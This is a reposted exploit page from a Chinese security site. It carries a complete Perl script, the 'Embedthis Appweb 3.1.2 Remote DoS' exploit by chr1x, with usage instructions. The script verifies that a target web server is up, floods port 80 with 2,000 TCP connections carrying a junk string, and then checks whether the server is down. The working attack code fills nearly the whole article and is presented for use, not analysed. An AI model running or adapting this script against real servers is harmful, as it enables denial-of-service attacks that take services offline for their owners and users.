首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Embedthis Appweb 3.1.2 Remote DoS Exploit
来源:chr1x@sectester.net 作者:chr1x 发布时间:2010-03-16  
=========================================
Embedthis Appweb 3.1.2 Remote DoS Exploit
=========================================

#!/usr/bin/perl
  
################################################################################
#
# +------------------------------------------------------------------------+
# |                                 .......                                |
# |                         ..''xxxxxxxxxxxxxxx'...                        |
# |                    ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx..                    |
# |                 ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'.                 |
# |               .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'.               |
# |             .'xxxxxxxxxxxxxxxxxxxxx''......        ...  ..             |
# |            .xxxxxxxxxxxxxxxxxx'...         ........      .'.           |
# |           'xxxxxxxxxxxxxxx'......                          '.          |
# |          'xxxxxxxxxxxxxx'..'x..                            .x.         |
# |         .xxxxxxxxxxxx'...'..                  ...           .'         |
# |         'xxxxxxxxx'..  .                          ..        .x.        |
# |         xxxxxxx'.                                  ..        x.        |
# |         xxxx'.                ....                  x        x.        |
# |         'x'.            ...'xxxxxxx'.               x       .x.        |
# |         .x'.         .'xxxxxxxxxxxxxx.             ''       .'         |
# |          .xx.      .'xxxxxxxxxxxxxxxx.           .'xx'''.  .'          |
# |           .xx..    'xxxxxxxxxxxxxxxx'          .'xxxxxxxxx''.          |
# |            .'xx'.  .'xxxxxxxxxxxxxxx.      ..'xxxxxxxxxxxx'            |
# |              .xxx'.  .xxxxxxxxxxxx'.    .'xxxxxxxxxxxxxx'.             |
# |                .xxxx'.'xxxxxxxxx'.      xxx'xxxxxxxxxx'.               |
# |                  .'xxxxxxx'....          ...xxxxxxx'.                  |
# |                     ..'xxxxx'..         ..xxxxx'..                     |
# |                          ....'xx'.....''''...                          |
# |                                                                        |
# |                    CubilFelino Security Research Labs                  |
# |                            proudly presents...                         |
# +------------------------------------------------------------------------+
#
#                 Embedthis Appweb 3.1.2 Remote DoS
#
#
# Greets: l1l1th (my h4x0r bab3), nitr0us, alt3kx, hkm, r1l0, b0rr3x, w01f,
#     w0lf47, gh0st, CHiP, corelanc0d3r and all the crew of sectester.net.
#
################################################################################
 
# Exploit Title: Embedthis Appweb 3.1.2 Remote DoS
# Date: Mar 12, 2010
# Author: chr1x
# Software Link: http://embedthis.com/downloads/index.html
# Version: 3.1.2
# Tested on: Windows XP SP3 (Spanish Edition)
 
# st4rt of v00d00 c0d3 XD
 
use HTTP::Lite;
use IO::Socket;
use locale;
 
if ($#ARGV != 1) { print "
############################################################
 CubilFelino Security Labs Embedthis Appweb 3.1.2 Remote DoS
        by chr1x\@sectester.net
############################################################
 
Usage: ". $0 ." -h (ip address)\n
 
"; exit; } &main();
 
 
sub main {
print "
############################################################
 CubilFelino Security Labs Embedthis Appweb 3.1.2 Remote DoS
        by chr1x\@sectester.net
############################################################
 
";
# Variables
$DossedIP = $ARGV[1];
# Execution functions
&appWebCheck();
sleep 30;
&afterDoS();
}
 
sub appWebCheck {
print "[*] Verifying that AppWeb is running at $DossedIP in port 80\n";
my $http = new HTTP::Lite;
my $req = $http->request("http://$DossedIP/")
        or die "[*] Remote address $DossedIP seems not to be up, stopped";
if ($req) { print "[*] w00t! Appweb seems to be running! Sending DoS.. XD\n";
for ($i=1; $i<=2000; $i++) {   
my $sock = new IO::Socket::INET (PeerAddr => $DossedIP, PeerPort => '80', Proto => 'tcp', Type => SOCK_STREAM,);
if ($sock) {
print "[*] Sending Connection request Number: $i\n";
print $sock "Die Biatch!";
close($sock);
}}}}
 
sub afterDoS {
 
$http = new HTTP::Lite;
$req = $http->request("http://$DossedIP/")
        or die "[*] Webserver DoSsed!! Port 80 is unreacheable now.";
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Oracle 11gR2 Multiple Remote P
·Ruby on Rails 'protect_from_fo
·httpdx v1.5.3b Multiple - Remo
·PhpMyLogon v2 SQL Injection Vu
·Media Player V6.4.9.1 with K-L
·Open & Compact FTPd 1.2 Pre-Au
·GOM Player v2.1.21 avi File Do
·Liquid XML Studio 2010 <= v8.0
·MicroWorld eScan Antivirus < 3
·# SWINGETTE 1.1 (.mp3) Buffer
·Multiple PHP Functions - Local
·QuickZip 4.60.019 Stack BOF -
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved